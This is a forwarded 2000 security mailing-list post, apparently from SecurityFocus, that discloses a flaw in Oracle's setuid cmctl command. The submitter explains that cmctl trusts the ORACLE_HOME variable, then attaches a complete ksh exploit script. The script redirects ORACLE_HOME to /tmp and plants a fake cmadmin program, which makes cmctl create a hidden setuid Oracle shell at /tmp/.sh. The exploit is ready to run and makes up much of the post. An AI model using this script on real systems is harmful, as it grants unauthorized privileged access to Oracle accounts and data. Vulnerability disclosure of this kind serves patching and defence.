[PEN-TEST] Oracle cmctl exploit - addendum for BugTraq ID 170 (fwd)

[Alfred Huger <ah () SECURITYFOCUS COM>]

Hey folks, this came into our Vulnerability Database today - I thought it
might be relevant given our current thread on Oracle/SQL et al.


Alfred Huger
VP of Engineering
SecurityFocus.com

---------- Forwarded message ----------
Date: Thu, 31 Aug 2000 13:58:33 -0400
From: Kevin Wenchel <kevin.wenchel () jhuapl edu>
To: vuldb () securityfocus com
Subject: Oracle cmctl exploit - addendum for BugTraq ID 170

Just an addendum to ID 170 in the Bugtraq database. ID 170 lists several
Oracle setuid executables that are "believed to contain security
vulnerabilities", although
no exploit info is given. Attached is an exploit I created recently for
the "cmctl" command.
The Oracle cmctl command trusts the integrity of the ORACLE_HOME and
ORA_HOME environment variables.
When you run the command "cmctl start cmadmin", cmctl looks under
$ORACLE_HOME\bin for an executable
called "cmadmin" and runs it. By modifying $ORACLE_HOME you can have all
sorts of fun with the Oracle account.

                                                                                -Kevin

#! /usr/bin/ksh
#############################################
#
# cmctl is installed setuid to Oracle
# by default. See BugTraq ID 170 and Oracle
# bug id 701297 and 714293. 
#
# This script will create a setuid Oracle shell,
# /tmp/.sh
#

# redirect environment variables
export ORACLE_HOME=/tmp
export ORAHOME=/tmp

mkdir /tmp/bin
chmod a+rx /tmp/bin

# create cmadmin script
cat <<EOF > /tmp/bin/cmadmin
cp /bin/sh /tmp/.sh
chmod u+s /tmp/.sh
chmod a+rx /tmp/.sh
EOF

chmod a+rx /tmp/bin/cmadmin

# run cmctl to crete Oracle setuid shell
/oracle/products/V815/bin/cmctl start cmadmin